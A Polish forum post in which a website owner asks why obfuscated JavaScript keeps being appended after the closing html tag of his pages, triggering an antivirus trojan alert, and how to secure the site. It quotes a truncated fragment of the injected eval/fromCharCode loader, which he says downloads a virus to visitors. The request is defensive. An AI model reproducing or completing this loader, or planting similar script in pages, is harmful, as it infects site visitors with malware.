Mam pewien problem. Działa sobie pewna stronka www i co jakiś czas jak na nią wchodzę avast wywala mi informację o wirusie. Nazwy wirusów się zmieniają, ostatnio JS:Redirector-NK[Trj].
Wszystkie te wirusy działają w ten sam sposób, tj. rozbudowują plik *.html dopisując za znacznikiem </html> kod w stylu:
<script>aa=([].slice+'vr3').substr(1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ww=window;ss=new String();s=String;12-function(){e=ww.eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5k"+"4.5k"+"52.5k"+"51k"+"16k"+"20k"+"50k"+"55.5k"+"49.5k"+"58.5k"+"54.5k"+"50.5k"+"55k"+"58k"+"23k"+"51.5k"+"50.5k"+"58k"+"34.5k"+"54k"+"50.5k"+"54.5k"+"50.5k"+"55k"+"58k"+"57.5k"+"33k"+"60.5k"+"42k"+"48.5k"+"51.5k"+"39k"+"48.5k"+"54.5k"+"50.5k"+"20k"+"19.5k"+"49k"+"55.5k"+"50k"+"60.5k"+"19.5k"+"20.5k"+"45.5k".......
Po rozszyfrowaniu podczas otwierania strony skutkuje to pobieraniem pliku wirusa.
I teraz pytanie..w sumie dwa.
1. Jak to się w ogóle dzieje, że coś jest dopisywane do pliku html? Czy wina leży po mojej stronie czy po stronie serwera na którym są pliki? Stronka jest prosta, zwykłe html + kilka JS, po części darmowych takie jak AC_RunActiveContent.js i lightbox.js. Możliwe że te zewnętrzne skrypty modyfikują stronę? Albo,że mam wirausa u siebie na komputerze (pomimo avasta) któy korzystając z danych programu ftp łączy się i modyfikuje pliki?
2. Jak się zabezpieczyć przed takimi atakami? Zmieniłem atrybuty plików z 644 na 600 czyli odczyt/zapis możliwy tylko dla właściciela ale to nic nie pomogło...
--
pozdrawiam
Michał
Użytkownik Shadovpl edytował ten post 17 01 2012 - 22:32